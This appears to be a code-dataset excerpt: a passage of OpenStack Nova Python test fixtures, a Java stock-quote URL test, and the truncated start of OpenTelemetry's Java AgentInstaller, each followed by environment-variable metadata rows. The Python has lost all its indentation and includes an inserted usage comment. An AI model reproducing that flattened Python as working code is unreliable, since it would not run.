# to a single bus. This is how our tests expect things
# to work. When the tests are fixed, this fixture can
# support simulating multiple independent buses, and this
# hack should be removed.
url = None
# NOTE(danms): This will be called with a non-None url by
# cells-aware code that is requesting to contact something on
# one of the many transports we're multiplexing here.
if url not in self._buses:
exmods = rpc.get_allowed_exmods()
self._buses[url] = messaging.get_rpc_transport(
CONF,
url=url,
allowed_remote_exmods=exmods)
return self._buses[url]
def setUp(self):
super(RPCFixture, self).setUp()
self.addCleanup(rpc.cleanup)
rpc.add_extra_exmods(*self.exmods)
self.addCleanup(rpc.clear_extra_exmods)
self.messaging_conf = messaging_conffixture.ConfFixture(CONF)
self.messaging_conf.transport_url = 'fake:/'
self.useFixture(self.messaging_conf)
self.useFixture(fixtures.MonkeyPatch(
'nova.rpc.create_transport', self._fake_create_transport))
# NOTE(danms): Execute the init with get_transport_url() as None,
# instead of the parsed TransportURL(None) so that we can cache
# it as it will be called later if the default is requested by
# one of our mq-switching methods.
with mock.patch('nova.rpc.get_transport_url') as mock_gtu:
mock_gtu.return_value = None
rpc.init(CONF)
def cleanup_in_flight_rpc_messages():
messaging._drivers.impl_fake.FakeExchangeManager._exchanges = {}
self.addCleanup(cleanup_in_flight_rpc_messages)
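# Illustrative usage sketch (not part of the original source): wiring up the fake
# in-memory message bus, allowing nova exceptions to cross the (fake) RPC boundary.
#
#     self.useFixture(RPCFixture('nova.exception'))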
class WarningsFixture(fixtures.Fixture):
"""Filters out warnings during test runs."""
def setUp(self):
super(WarningsFixture, self).setUp()
# NOTE(sdague): Make deprecation warnings only happen once. Otherwise
# this gets kind of crazy given the way that upstream python libs use
# this.
warnings.simplefilter("once", DeprecationWarning)
# NOTE(sdague): this remains an unresolved item around the way
# forward on is_admin, the deprecation is definitely really premature.
warnings.filterwarnings('ignore',
message='Policy enforcement is depending on the value of is_admin.'
' This key is deprecated. Please update your policy '
'file to use the standard policy values.')
# NOTE(mriedem): Ignore scope check UserWarnings from oslo.policy.
warnings.filterwarnings('ignore',
message="Policy .* failed scope check",
category=UserWarning)
# NOTE(gibi): The UUIDFields emits a warning if the value is not a
# valid UUID. Let's escalate that to an exception in the test to
# prevent adding violations.
warnings.filterwarnings('error', message=".*invalid UUID.*")
# NOTE(mriedem): Avoid adding anything which tries to convert an
# object to a primitive which jsonutils.to_primitive() does not know
# how to handle (or isn't given a fallback callback).
warnings.filterwarnings(
'error',
message="Cannot convert <oslo_db.sqlalchemy.enginefacade"
"._Default object at ",
category=UserWarning)
warnings.filterwarnings(
'error', message='Evaluating non-mapped column expression',
category=sqla_exc.SAWarning)
# NOTE(stephenfin): Disable the annoying "TypeDecorator foo will not
# produce a cache key because the ``cache_ok`` flag is not set to True"
# warning. It's fixed in oslo.db 10.0.0 but not before.
# TODO(stephenfin): Remove once we bump oslo.db in lower-constraints to
# 10.0.0
warnings.filterwarnings(
'ignore',
message=r'TypeDecorator SoftDeleteInteger\(\) will not produce .*',
category=sqla_exc.SAWarning)
# TODO(stephenfin): Remove once we fix this is oslo.db 10.0.1 or so
warnings.filterwarnings(
'ignore',
message=r'Invoking and_\(\) without arguments is deprecated, .*',
category=sqla_exc.SADeprecationWarning)
# TODO(stephenfin): Remove once we fix this in placement 5.0.2 or 6.0.0
warnings.filterwarnings(
'ignore',
message='Implicit coercion of SELECT and textual SELECT .*',
category=sqla_exc.SADeprecationWarning)
# TODO(jangutter): Change (or remove) this to an error during the Train
# cycle when the os-vif port profile is no longer used.
warnings.filterwarnings(
'ignore', message=".* 'VIFPortProfileOVSRepresentor' .* "
"is deprecated", category=PendingDeprecationWarning)
self.addCleanup(warnings.resetwarnings)
class ConfPatcher(fixtures.Fixture):
"""Fixture to patch and restore global CONF.
This also resets overrides for everything that is patched during
its teardown.
"""
def __init__(self, **kwargs):
"""Constructor
:params group: if specified all config options apply to that group.
:params **kwargs: the rest of the kwargs are processed as a
set of key/value pairs to be set as configuration override.
"""
super(ConfPatcher, self).__init__()
self.group = kwargs.pop('group', None)
self.args = kwargs
def setUp(self):
super(ConfPatcher, self).setUp()
for k, v in self.args.items():
self.addCleanup(CONF.clear_override, k, self.group)
CONF.set_override(k, v, self.group)
class OSAPIFixture(fixtures.Fixture):
"""Create an OS API server as a fixture.
This spawns an OS API server as a fixture in a new greenthread in
the current test. The fixture has a .api parameter which is a
simple rest client that can communicate with it.
This fixture is extremely useful for testing REST responses
through the WSGI stack easily in functional tests.
Usage:
api = self.useFixture(fixtures.OSAPIFixture()).api
resp = api.api_request('/someurl')
self.assertEqual(200, resp.status_code)
resp = api.api_request('/otherurl', method='POST', body='{foo}')
The resp is a requests library response. Common attributes that
you'll want to use are:
- resp.status_code - integer HTTP status code returned by the request
- resp.content - the body of the response
- resp.headers - dictionary of HTTP headers returned
"""
def __init__(
self, api_version='v2', project_id=PROJECT_ID,
use_project_id_in_urls=False, stub_keystone=True,
):
"""Constructor
:param api_version: the API version that we're interested in
using. Currently this expects 'v2' or 'v2.1' as possible
options.
:param project_id: the project id to use on the API.
:param use_project_id_in_urls: If True, act like the "endpoint" in the
"service catalog" has the legacy format including the project_id.
:param stub_keystone: If True, stub keystonemiddleware and
NovaKeystoneContext to simulate (but not perform) real auth.
"""
super(OSAPIFixture, self).__init__()
self.api_version = api_version
self.project_id = project_id
self.use_project_id_in_urls = use_project_id_in_urls
self.stub_keystone = stub_keystone
def setUp(self):
super(OSAPIFixture, self).setUp()
# A unique hostname for the wsgi-intercept.
hostname = uuidsentinel.osapi_host
port = 80
service_name = 'osapi_compute'
endpoint = 'http://%s:%s/' % (hostname, port)
conf_overrides = {
'osapi_compute_listen': hostname,
'osapi_compute_listen_port': port,
'debug': True,
}
self.useFixture(ConfPatcher(**conf_overrides))
if self.stub_keystone:
self._stub_keystone()
# Turn off manipulation of socket_options in TCPKeepAliveAdapter
# to keep wsgi-intercept happy. Replace it with the method
# from its superclass.
self.useFixture(fixtures.MonkeyPatch(
'keystoneauth1.session.TCPKeepAliveAdapter.init_poolmanager',
adapters.HTTPAdapter.init_poolmanager))
loader = wsgi.Loader().load_app(service_name)
app = lambda: loader
# re-use service setup code from wsgi_app to register
# service, which is looked for in some tests
wsgi_app._setup_service(CONF.host, service_name)
intercept = interceptor.RequestsInterceptor(app, url=endpoint)
intercept.install_intercept()
self.addCleanup(intercept.uninstall_intercept)
base_url = 'http://%(host)s:%(port)s/%(api_version)s' % ({
'host': hostname, 'port': port, 'api_version': self.api_version})
if self.use_project_id_in_urls:
base_url += '/' + self.project_id
self.api = client.TestOpenStackClient(
'fake', base_url, project_id=self.project_id)
self.admin_api = client.TestOpenStackClient(
'admin', base_url, project_id=self.project_id)
# Provide a way to access the wsgi application to tests using
# the fixture.
self.app = app
def _stub_keystone(self):
# Stub out authentication middleware
# TODO(efried): Use keystonemiddleware.fixtures.AuthTokenFixture
self.useFixture(fixtures.MockPatch(
'keystonemiddleware.auth_token.filter_factory',
return_value=lambda _app: _app))
# Stub out context middleware
def fake_ctx(env, **kwargs):
user_id = env['HTTP_X_AUTH_USER']
project_id = env['HTTP_X_AUTH_PROJECT_ID']
is_admin = user_id == 'admin'
return context.RequestContext(
user_id, project_id, is_admin=is_admin, **kwargs)
self.useFixture(fixtures.MonkeyPatch(
'nova.api.auth.NovaKeystoneContext._create_context', fake_ctx))
class OSMetadataServer(fixtures.Fixture):
"""Create an OS Metadata API server as a fixture.
This spawns an OS Metadata API server as a fixture in a new
greenthread in the current test.
TODO(sdague): ideally for testing we'd have something like the
test client which acts like requests, but connects any of the
interactions needed.
"""
def setUp(self):
super(OSMetadataServer, self).setUp()
# in order to run these in tests we need to bind only to local
# host, and dynamically allocate ports
conf_overrides = {
'metadata_listen': '127.0.0.1',
'metadata_listen_port': 0,
'debug': True
}
self.useFixture(ConfPatcher(**conf_overrides))
self.metadata = service.WSGIService("metadata")
self.metadata.start()
self.addCleanup(self.metadata.stop)
self.md_url = "http://%s:%s/" % (
conf_overrides['metadata_listen'],
self.metadata.port)
class PoisonFunctions(fixtures.Fixture):
"""Poison functions so they explode if we touch them.
When running under a non full stack test harness there are parts
of the code that you don't want to go anywhere near. These include
things like code that spins up extra threads, which just
introduces races.
"""
def setUp(self):
super(PoisonFunctions, self).setUp()
try:
self._poison_libvirt_driver()
except ImportError:
# The libvirt driver uses modules that are not available
# on Windows.
if os.name != 'nt':
raise
def _poison_libvirt_driver(self):
# The nova libvirt driver starts an event thread which only
# causes trouble in tests. Make sure that if tests don't
# properly patch it the test explodes.
def evloop(*args, **kwargs):
import sys
warnings.warn("Forgot to disable libvirt event thread")
sys.exit(1)
# Don't poison the function if it's already mocked
import nova.virt.libvirt.host
if not isinstance(nova.virt.libvirt.host.Host._init_events, mock.Mock):
self.useFixture(fixtures.MockPatch(
'nova.virt.libvirt.host.Host._init_events',
side_effect=evloop))
class IndirectionAPIFixture(fixtures.Fixture):
"""Patch and restore the global NovaObject indirection api."""
def __init__(self, indirection_api):
"""Constructor
:param indirection_api: the indirection API to be used for tests.
"""
super(IndirectionAPIFixture, self).__init__()
self.indirection_api = indirection_api
def cleanup(self):
obj_base.NovaObject.indirection_api = self.orig_indirection_api
def setUp(self):
super(IndirectionAPIFixture, self).setUp()
self.orig_indirection_api = obj_base.NovaObject.indirection_api
obj_base.NovaObject.indirection_api = self.indirection_api
self.addCleanup(self.cleanup)
class _FakeGreenThread(object):
def __init__(self, func, *args, **kwargs):
self._result = func(*args, **kwargs)
def cancel(self, *args, **kwargs):
# This method doesn't make sense for a synchronous call, it's just
# defined to satisfy the interface.
pass
def kill(self, *args, **kwargs):
# This method doesn't make sense for a synchronous call, it's just
# defined to satisfy the interface.
pass
def link(self, func, *args, **kwargs):
func(self, *args, **kwargs)
def unlink(self, func, *args, **kwargs):
# This method doesn't make sense for a synchronous call, it's just
# defined to satisfy the interface.
pass
def wait(self):
return self._result
class SpawnIsSynchronousFixture(fixtures.Fixture):
"""Patch and restore the spawn_n utility method to be synchronous"""
def setUp(self):
super(SpawnIsSynchronousFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.utils.spawn_n', _FakeGreenThread))
self.useFixture(fixtures.MonkeyPatch(
'nova.utils.spawn', _FakeGreenThread))
class _FakeExecutor(futurist.SynchronousExecutor):
def __init__(self, *args, **kwargs):
# Ignore kwargs (example: max_workers) that SynchronousExecutor
# does not support.
super(_FakeExecutor, self).__init__()
class SynchronousThreadPoolExecutorFixture(fixtures.Fixture):
"""Make GreenThreadPoolExecutor synchronous.
Replace the GreenThreadPoolExecutor with the SynchronousExecutor.
"""
def setUp(self):
super(SynchronousThreadPoolExecutorFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'futurist.GreenThreadPoolExecutor', _FakeExecutor))
class BannedDBSchemaOperations(fixtures.Fixture):
"""Ban some operations for migrations"""
def __init__(self, banned_resources=None):
super(BannedDBSchemaOperations, self).__init__()
self._banned_resources = banned_resources or []
@staticmethod
def _explode(resource, op):
raise exception.DBNotAllowed(
'Operation %s.%s() is not allowed in a database migration' % (
resource, op))
def setUp(self):
super(BannedDBSchemaOperations, self).setUp()
for thing in self._banned_resources:
self.useFixture(fixtures.MonkeyPatch(
'sqlalchemy.%s.drop' % thing,
lambda *a, **k: self._explode(thing, 'drop')))
self.useFixture(fixtures.MonkeyPatch(
'sqlalchemy.%s.alter' % thing,
lambda *a, **k: self._explode(thing, 'alter')))
class ForbidNewLegacyNotificationFixture(fixtures.Fixture):
"""Make sure the test fails if new legacy notification is added"""
def __init__(self):
super(ForbidNewLegacyNotificationFixture, self).__init__()
self.notifier = rpc.LegacyValidatingNotifier
def setUp(self):
super(ForbidNewLegacyNotificationFixture, self).setUp()
self.notifier.fatal = True
# allow the special test value used in
# nova.tests.unit.test_notifications.NotificationsTestCase
self.notifier.allowed_legacy_notification_event_types.append(
'_decorated_function')
self.addCleanup(self.cleanup)
def cleanup(self):
self.notifier.fatal = False
self.notifier.allowed_legacy_notification_event_types.remove(
'_decorated_function')
class AllServicesCurrent(fixtures.Fixture):
def setUp(self):
super(AllServicesCurrent, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.Service.get_minimum_version_multi',
self._fake_minimum))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.service.get_minimum_version_all_cells',
lambda *a, **k: service_obj.SERVICE_VERSION))
compute_rpcapi.LAST_VERSION = None
def _fake_minimum(self, *args, **kwargs):
return service_obj.SERVICE_VERSION
class _NoopConductor(object):
def __getattr__(self, key):
def _noop_rpc(*args, **kwargs):
return None
return _noop_rpc
class NoopConductorFixture(fixtures.Fixture):
"""Stub out the conductor API to do nothing"""
def setUp(self):
super(NoopConductorFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.conductor.ComputeTaskAPI', _NoopConductor))
self.useFixture(fixtures.MonkeyPatch(
'nova.conductor.API', _NoopConductor))
class EventReporterStub(fixtures.Fixture):
def setUp(self):
super(EventReporterStub, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.compute.utils.EventReporter',
lambda *args, **kwargs: mock.MagicMock()))
class UnHelperfulClientChannel(privsep_daemon._ClientChannel):
def __init__(self, context):
raise Exception('You have attempted to start a privsep helper. '
'This is not allowed in the gate, and '
'indicates a failure to have mocked your tests.')
class PrivsepNoHelperFixture(fixtures.Fixture):
"""A fixture to catch failures to mock privsep's rootwrap helper.
If you fail to mock away a privsep'd method in a unit test, then
you may well end up accidentally running the privsep rootwrap
helper. This will fail in the gate, but it fails in a way which
doesn't identify which test is missing a mock. Instead, we
raise an exception so that you at least know where you've missed
something.
"""
def setUp(self):
super(PrivsepNoHelperFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'oslo_privsep.daemon.RootwrapClientChannel',
UnHelperfulClientChannel))
class PrivsepFixture(fixtures.Fixture):
"""Disable real privsep checking so we can test the guts of methods
decorated with sys_admin_pctxt.
"""
def setUp(self):
super(PrivsepFixture, self).setUp()
self.useFixture(fixtures.MockPatchObject(
nova.privsep.sys_admin_pctxt, 'client_mode', False))
class NoopQuotaDriverFixture(fixtures.Fixture):
"""A fixture to run tests using the NoopQuotaDriver.
We can't simply set self.flags to the NoopQuotaDriver in tests to use the
NoopQuotaDriver because the QuotaEngine object is global. Concurrently
running tests will fail intermittently because they might get the
NoopQuotaDriver globally when they expected the default DbQuotaDriver
behavior. So instead, we can patch the _driver property of the QuotaEngine
class on a per-test basis.
"""
def setUp(self):
super(NoopQuotaDriverFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch('nova.quota.QuotaEngine._driver',
nova_quota.NoopQuotaDriver()))
# Set the config option just so that code checking for the presence of
# the NoopQuotaDriver setting will see it as expected.
# For some reason, this does *not* work when TestCase.flags is used.
# When using self.flags, the concurrent test failures returned.
CONF.set_override('driver', 'nova.quota.NoopQuotaDriver', 'quota')
self.addCleanup(CONF.clear_override, 'driver', 'quota')
class DownCellFixture(fixtures.Fixture):
"""A fixture to simulate when a cell is down either due to error or timeout
This fixture will stub out the scatter_gather_cells routine and target_cell
used in various cells-related API operations like listing/showing server
details to return an ``oslo_db.exception.DBError`` per cell in the results.
Therefore it is best used with a test scenario like this:
1. Create a server successfully.
2. Using the fixture, list/show servers. Depending on the microversion
used, the API should either return minimal results or by default skip
the results from down cells.
Example usage::
with nova_fixtures.DownCellFixture():
# List servers with down cells.
self.api.get_servers()
# Show a server in a down cell.
self.api.get_server(server['id'])
# List services with down cells.
self.admin_api.api_get('/os-services')
"""
def __init__(self, down_cell_mappings=None):
self.down_cell_mappings = down_cell_mappings
def setUp(self):
super(DownCellFixture, self).setUp()
def stub_scatter_gather_cells(ctxt, cell_mappings, timeout, fn, *args,
**kwargs):
# Return a dict with an entry per cell mapping where the results
# are some kind of exception.
up_cell_mappings = objects.CellMappingList()
if not self.down_cell_mappings:
# User has not passed any down cells explicitly, so all cells
# are considered as down cells.
self.down_cell_mappings = cell_mappings
else:
# User has passed down cell mappings, so the rest of the cells
# should be up meaning we should return the right results.
# We assume that down cells will be a subset of the
# cell_mappings.
down_cell_uuids = [cell.uuid
for cell in self.down_cell_mappings]
up_cell_mappings.objects = [cell
for cell in cell_mappings
if cell.uuid not in down_cell_uuids]
def wrap(cell_uuid, thing):
# We should embed the cell_uuid into the context before
# wrapping since it's used to calculate the cells_timed_out and
# cells_failed properties in the object.
ctxt.cell_uuid = cell_uuid
return multi_cell_list.RecordWrapper(ctxt, sort_ctx, thing)
if fn is multi_cell_list.query_wrapper:
# If the function called through scatter-gather utility is the
# multi_cell_list.query_wrapper, we should wrap the exception
# object into the multi_cell_list.RecordWrapper. This is
# because unlike the other functions where the exception object
# is returned directly, the query_wrapper wraps this into the
# RecordWrapper object format. So if we do not wrap it will
# blow up at the point of generating results from heapq further
# down the stack.
sort_ctx = multi_cell_list.RecordSortContext([], [])
ret1 = {
cell_mapping.uuid: [wrap(cell_mapping.uuid,
db_exc.DBError())]
for cell_mapping in self.down_cell_mappings
}
else:
ret1 = {
cell_mapping.uuid: db_exc.DBError()
for cell_mapping in self.down_cell_mappings
}
ret2 = {}
for cell in up_cell_mappings:
ctxt.cell_uuid = cell.uuid
cctxt = context.RequestContext.from_dict(ctxt.to_dict())
context.set_target_cell(cctxt, cell)
result = fn(cctxt, *args, **kwargs)
ret2[cell.uuid] = result
return dict(list(ret1.items()) + list(ret2.items()))
@contextmanager
def stub_target_cell(ctxt, cell_mapping):
# This is to give the freedom to simulate down cells for each
# individual cell targeted function calls.
if not self.down_cell_mappings:
# User has not passed any down cells explicitly, so all cells
# are considered as down cells.
self.down_cell_mappings = [cell_mapping]
raise db_exc.DBError()
else:
# if down_cell_mappings are passed, then check if this cell
# is down or up.
down_cell_uuids = [cell.uuid
for cell in self.down_cell_mappings]
if cell_mapping.uuid in down_cell_uuids:
# it's a down cell, raise the exception straight away
raise db_exc.DBError()
else:
# it's an up cell, so yield its context
cctxt = context.RequestContext.from_dict(ctxt.to_dict())
context.set_target_cell(cctxt, cell_mapping)
yield cctxt
self.useFixture(fixtures.MonkeyPatch(
'nova.context.scatter_gather_cells', stub_scatter_gather_cells))
self.useFixture(fixtures.MonkeyPatch(
'nova.context.target_cell', stub_target_cell))
class AvailabilityZoneFixture(fixtures.Fixture):
"""Fixture to stub out the nova.availability_zones module
The list of ``zones`` provided to the fixture is what gets returned from
``get_availability_zones``.
``get_instance_availability_zone`` will return the availability_zone
requested when creating a server; otherwise the instance.availability_zone
or default_availability_zone is returned.
"""
def __init__(self, zones):
self.zones = zones
def setUp(self):
super(AvailabilityZoneFixture, self).setUp()
def fake_get_availability_zones(
ctxt, hostapi, get_only_available=False,
with_hosts=False, services=None):
# A 2-item tuple is returned if get_only_available=False.
if not get_only_available:
return self.zones, []
return self.zones
self.useFixture(fixtures.MonkeyPatch(
'nova.availability_zones.get_availability_zones',
fake_get_availability_zones))
def fake_get_instance_availability_zone(ctxt, instance):
# If the server was created with a specific AZ, return it.
reqspec = objects.RequestSpec.get_by_instance_uuid(
ctxt, instance.uuid)
requested_az = reqspec.availability_zone
if requested_az:
return requested_az
# Otherwise return the instance.availability_zone if set else
# the default AZ.
return instance.availability_zone or CONF.default_availability_zone
self.useFixture(fixtures.MonkeyPatch(
'nova.availability_zones.get_instance_availability_zone',
fake_get_instance_availability_zone))
class KSAFixture(fixtures.Fixture):
"""Lets us initialize an openstack.connection.Connection by stubbing the
auth plugin.
"""
def setUp(self):
super(KSAFixture, self).setUp()
self.mock_load_auth = self.useFixture(fixtures.MockPatch(
'keystoneauth1.loading.load_auth_from_conf_options')).mock
self.mock_load_sess = self.useFixture(fixtures.MockPatch(
'keystoneauth1.loading.load_session_from_conf_options')).mock
# For convenience, an attribute for the "Session" itself
self.mock_session = self.mock_load_sess.return_value
class OpenStackSDKFixture(fixtures.Fixture):
# This satisfies tests that happen to run through get_sdk_adapter but don't
# care about the adapter itself (default mocks are fine).
# TODO(efried): Get rid of this and use fixtures from openstacksdk once
# https://storyboard.openstack.org/#!/story/2005475 is resolved.
def setUp(self):
super(OpenStackSDKFixture, self).setUp()
self.useFixture(fixtures.MockPatch(
'openstack.proxy.Proxy.get_endpoint'))
real_make_proxy = service_description.ServiceDescription._make_proxy
_stub_service_types = {'placement'}
def fake_make_proxy(self, instance):
if self.service_type in _stub_service_types:
return instance.config.get_session_client(
self.service_type,
allow_version_hack=True,
)
return real_make_proxy(self, instance)
self.useFixture(fixtures.MockPatchObject(
service_description.ServiceDescription, '_make_proxy',
fake_make_proxy))
class HostNameWeigher(weights.BaseHostWeigher):
"""Weigher to make the scheduler host selection deterministic.
Note that this weigher is supposed to be used via
HostNameWeigherFixture and will fail to instantiate if used without that
fixture.
"""
def __init__(self):
self.weights = self.get_weights()
def get_weights(self):
raise NotImplementedError()
def _weigh_object(self, host_state, weight_properties):
# Any unspecified host gets no weight.
return self.weights.get(host_state.host, 0)
class HostNameWeigherFixture(fixtures.Fixture):
"""Fixture to make the scheduler host selection deterministic.
Note that this fixture needs to be used before the scheduler service is
started as it changes the scheduler configuration.
"""
def __init__(self, weights=None):
"""Create the fixture
:param weights: A dict of weights keyed by host names. Defaulted to
{'host1': 100, 'host2': 50, 'host3': 10}
"""
if weights:
self.weights = weights
else:
# default weights good for most of the functional tests
self.weights = {'host1': 100, 'host2': 50, 'host3': 10}
def setUp(self):
super(HostNameWeigherFixture, self).setUp()
# Make sure that when the scheduler instantiates the HostNameWeigher it
# is initialized with the weights that are configured in this fixture
self.useFixture(fixtures.MockPatchObject(
HostNameWeigher, 'get_weights', return_value=self.weights))
# Make sure that the scheduler loads the HostNameWeigher and only that
self.useFixture(ConfPatcher(
weight_classes=[__name__ + '.HostNameWeigher'],
group='filter_scheduler'))
class GenericPoisonFixture(fixtures.Fixture):
POISON_THESE = (
(
'netifaces.interfaces',
'tests should not be inspecting real interfaces on the test node',
),
(
'os.uname',
'tests should not be inspecting host information on the test node',
),
)
def setUp(self):
def poison_configure(method, reason):
def fail(*a, **k):
raise Exception('This test invokes %s, which is bad (%s); you '
'should mock it.' % (method, reason))
return fail
super(GenericPoisonFixture, self).setUp()
for meth, why in self.POISON_THESE:
# attempt to mock only if not already mocked
location, attribute = meth.rsplit('.', 1)
components = location.split('.')
try:
current = __import__(components[0], {}, {})
for component in components[1:]:
current = getattr(current, component)
if not isinstance(getattr(current, attribute), mock.Mock):
self.useFixture(fixtures.MonkeyPatch(
meth, poison_configure(meth, why)))
except ImportError:
self.useFixture(fixtures.MonkeyPatch(
meth, poison_configure(meth, why)))
|
[] |
[] |
[
"OS_DEBUG"
] |
[]
|
["OS_DEBUG"]
|
python
| 1 | 0 | |
src/test/java/nitezh/ministock/utils/UrlDataToolsTests.java
|
package nitezh.ministock.utils;
import org.json.JSONObject;
import org.junit.Assume;
import org.junit.Test;
import java.io.IOException;
import static org.junit.Assert.assertEquals;
public class UrlDataToolsTests {
@Test
public void testDataRetrievalFromIex() throws IOException {
// SkipIf
Assume.assumeTrue(System.getenv("TRAVIS_CI") == null);
// Arrange
String url = "https://api.iextrading.com/1.0/stock/market/batch?symbols=aapl&types=quote";
// Act
String result = UrlDataTools.urlToString(url).substring(0, 33);
// Assert
String expected = "{\"AAPL\":{\"quote\":{\"symbol\":\"AAPL\"";
assertEquals(expected, result);
}
@Test
public void testGetCachedUrlData() throws Exception{
/*
// SkipIf
Assume.assumeTrue(System.getenv("TRAVIS_CI") == null);
// Arrange
String url = "https://api.iextrading.com/1.0/stock/market/batch?symbols=aapl&types=quote";
Cache cache = new Cache() {
@Override
protected JSONObject loadCache() {
return null;
}
@Override
protected void persistCache(JSONObject cache) {
}
};
//Act
String result = UrlDataTools.getCachedUrlData(url, cache, 300);
//Assert
String expected = "";
assertEquals(expected, result);
*/
}
}
|
[
"\"TRAVIS_CI\"",
"\"TRAVIS_CI\""
] |
[] |
[
"TRAVIS_CI"
] |
[]
|
["TRAVIS_CI"]
|
java
| 1 | 0 | |
javaagent-tooling/src/main/java/io/opentelemetry/javaagent/tooling/AgentInstaller.java
|
/*
* Copyright The OpenTelemetry Authors
* SPDX-License-Identifier: Apache-2.0
*/
package io.opentelemetry.javaagent.tooling;
import static io.opentelemetry.javaagent.bootstrap.AgentInitializer.isJavaBefore9;
import static io.opentelemetry.javaagent.tooling.SafeServiceLoader.load;
import static io.opentelemetry.javaagent.tooling.SafeServiceLoader.loadOrdered;
import static io.opentelemetry.javaagent.tooling.Utils.getResourceName;
import static net.bytebuddy.matcher.ElementMatchers.any;
import io.opentelemetry.context.Context;
import io.opentelemetry.context.ContextStorage;
import io.opentelemetry.context.Scope;
import io.opentelemetry.instrumentation.api.config.Config;
import io.opentelemetry.javaagent.bootstrap.AgentClassLoader;
import io.opentelemetry.javaagent.bootstrap.BootstrapPackagePrefixesHolder;
import io.opentelemetry.javaagent.bootstrap.ClassFileTransformerHolder;
import io.opentelemetry.javaagent.extension.AgentListener;
import io.opentelemetry.javaagent.extension.bootstrap.BootstrapPackagesConfigurer;
import io.opentelemetry.javaagent.extension.ignore.IgnoredTypesConfigurer;
import io.opentelemetry.javaagent.extension.instrumentation.InstrumentationModule;
import io.opentelemetry.javaagent.instrumentation.api.internal.InstrumentedTaskClasses;
import io.opentelemetry.javaagent.tooling.asyncannotationsupport.WeakRefAsyncOperationEndStrategies;
import io.opentelemetry.javaagent.tooling.bootstrap.BootstrapPackagesBuilderImpl;
import io.opentelemetry.javaagent.tooling.config.ConfigInitializer;
import io.opentelemetry.javaagent.tooling.ignore.IgnoredClassLoadersMatcher;
import io.opentelemetry.javaagent.tooling.ignore.IgnoredTypesBuilderImpl;
import io.opentelemetry.javaagent.tooling.ignore.IgnoredTypesMatcher;
import io.opentelemetry.javaagent.tooling.muzzle.AgentTooling;
import io.opentelemetry.javaagent.tooling.util.Trie;
import java.lang.instrument.Instrumentation;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.stream.Stream;
import java.util.stream.StreamSupport;
import javax.annotation.Nullable;
import net.bytebuddy.agent.builder.AgentBuilder;
import net.bytebuddy.agent.builder.ResettableClassFileTransformer;
import net.bytebuddy.description.type.TypeDefinition;
import net.bytebuddy.description.type.TypeDescription;
import net.bytebuddy.dynamic.DynamicType;
import net.bytebuddy.utility.JavaModule;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public class AgentInstaller {
private static final Logger logger;
private static final String JAVAAGENT_ENABLED_CONFIG = "otel.javaagent.enabled";
// This property may be set to force synchronous AgentListener#afterAgent() execution: the
// condition for delaying the AgentListener initialization is pretty broad, and in case it covers
// too much, javaagent users can file a bug, force sync execution by setting this property to true,
// and continue using the javaagent.
private static final String FORCE_SYNCHRONOUS_AGENT_LISTENERS_CONFIG =
"otel.javaagent.experimental.force-synchronous-agent-listeners";
private static final String STRICT_CONTEXT_STRESSOR_MILLIS =
"otel.javaagent.testing.strict-context-stressor-millis";
private static final Map<String, List<Runnable>> CLASS_LOAD_CALLBACKS = new HashMap<>();
static {
LoggingConfigurer.configureLogger();
logger = LoggerFactory.getLogger(AgentInstaller.class);
addByteBuddyRawSetting();
// this needs to be done as early as possible - before the first Config.get() call
ConfigInitializer.initialize();
Integer strictContextStressorMillis = Integer.getInteger(STRICT_CONTEXT_STRESSOR_MILLIS);
if (strictContextStressorMillis != null) {
io.opentelemetry.context.ContextStorage.addWrapper(
storage -> new StrictContextStressor(storage, strictContextStressorMillis));
}
}
public static void installBytebuddyAgent(Instrumentation inst) {
logVersionInfo();
Config config = Config.get();
if (config.getBoolean(JAVAAGENT_ENABLED_CONFIG, true)) {
setupUnsafe(inst);
List<AgentListener> agentListeners = loadOrdered(AgentListener.class);
installBytebuddyAgent(inst, agentListeners);
} else {
logger.debug("Tracing is disabled, not installing instrumentations.");
}
}
/**
* Install the core bytebuddy agent along with all implementations of {@link
* InstrumentationModule}.
*
* @param inst Java Instrumentation used to install bytebuddy
* @return the agent's class transformer
*/
public static ResettableClassFileTransformer installBytebuddyAgent(
Instrumentation inst, Iterable<AgentListener> agentListeners) {
WeakRefAsyncOperationEndStrategies.initialize();
Config config = Config.get();
setBootstrapPackages(config);
runBeforeAgentListeners(agentListeners, config);
AgentBuilder agentBuilder =
new AgentBuilder.Default()
.disableClassFormatChanges()
.with(AgentBuilder.RedefinitionStrategy.RETRANSFORMATION)
.with(new RedefinitionDiscoveryStrategy())
.with(AgentBuilder.DescriptionStrategy.Default.POOL_ONLY)
.with(AgentTooling.poolStrategy())
.with(new ClassLoadListener())
.with(AgentTooling.locationStrategy(Utils.getBootstrapProxy()));
if (JavaModule.isSupported()) {
agentBuilder = agentBuilder.with(new ExposeAgentBootstrapListener(inst));
}
agentBuilder = configureIgnoredTypes(config, agentBuilder);
if (logger.isDebugEnabled()) {
agentBuilder =
agentBuilder
.with(AgentBuilder.RedefinitionStrategy.RETRANSFORMATION)
.with(new RedefinitionDiscoveryStrategy())
.with(new RedefinitionLoggingListener())
.with(new TransformLoggingListener());
}
int numberOfLoadedExtensions = 0;
for (AgentExtension agentExtension : loadOrdered(AgentExtension.class)) {
logger.debug(
"Loading extension {} [class {}]",
agentExtension.extensionName(),
agentExtension.getClass().getName());
try {
agentBuilder = agentExtension.extend(agentBuilder);
numberOfLoadedExtensions++;
} catch (Exception | LinkageError e) {
logger.error(
"Unable to load extension {} [class {}]",
agentExtension.extensionName(),
agentExtension.getClass().getName(),
e);
}
}
logger.debug("Installed {} extension(s)", numberOfLoadedExtensions);
ResettableClassFileTransformer resettableClassFileTransformer = agentBuilder.installOn(inst);
ClassFileTransformerHolder.setClassFileTransformer(resettableClassFileTransformer);
runAfterAgentListeners(agentListeners, config);
return resettableClassFileTransformer;
}
private static void setupUnsafe(Instrumentation inst) {
try {
UnsafeInitializer.initialize(inst, AgentInstaller.class.getClassLoader());
